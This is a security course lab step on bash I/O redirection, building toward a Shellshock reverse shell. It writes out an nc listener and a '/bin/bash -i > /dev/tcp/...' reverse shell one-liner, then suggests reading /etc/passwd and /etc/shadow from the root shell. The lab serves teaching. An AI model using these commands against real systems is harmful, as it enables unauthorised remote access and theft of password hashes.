Lab: Shellshock IO Redirection

The goal of this step is to understand io redirection in bash.

Step: 5

Bash is our target program for this attack.
To exploit it, we would like to make bash provide a "reverse shell"
To do this, we need to learn a bit more about bash.
File descriptors
- C++ programs
  - cin deals with the standard input stream.
  - cout deals with the standard output stream.
  - cerr deals with the standard error stream.
- Take a look at ioTest.cpp in the shellShock directory.
  - run this.
- At the C level, these can be accessed by a number, or a file descriptor
  - cin is 0
  - cout is 1
  - cerr is 2.
- This carries over to bash as well.
I/O redirection
- in bash, you can have a program change the destination of cin, cout and cerr with the < and > operators.
  - in is a file in the shellShock directory.
  - Try:
```
ioTest < in 
```
  - This will map the file in to the standard input stream.
  - now try:
```
 ioTest > out 
```
    - You will need to type something, you will not be prompted
    - This maps the file out to the standard output stream.
    - And it consumed the prompt.
  - Finally try:
```
 ioTest 2> err
```
    - No space between 2 and >
    - Notice this sends stream 2 (or cerr) to the file err
- We can send multiple streams to the same place as well.
  - order is important.
  - ```
  ioTest > newOut 2>&1
```
- What did this do?
- Something strange
  - Start a nc server in one window
```
nc -l 9090 -v
```
  - In another window run
    - /dev/tcp/localhost/9090 is the location of the network connection
    - 0<&1 makes stdin and stdout the same.
  - Now type in the server window (the nc window)
  - Notice the output of the program is sent to the server, and anything the server writes is sent back to the program.
- We could use this to ping a web server
  - Take a look at webClient.cpp
  - ```
  webClient > /dev/tcp/10.0.2.15/80 0<&1
      OR
  webClient > /dev/tcp/localhost/http 0<&1
```
- A remote shell
  - Start a nc server in one window
```
nc -l 9090 -v
```
  - In another terminal run sudo to become root
    - This is not required, but I want the shell as a different user.
  - In the root window run
```
/bin/bash -i > /dev/tcp/localhost/9090 2>&1 0<&1
```
  - Notice in the server window you now have a root shell.
    - Don't use more or less
    - But cat /etc/passwd
    - cat /etc/shadow
- If we could trick a network enabled program (like httpd) to run this shell, we would have access to the machine.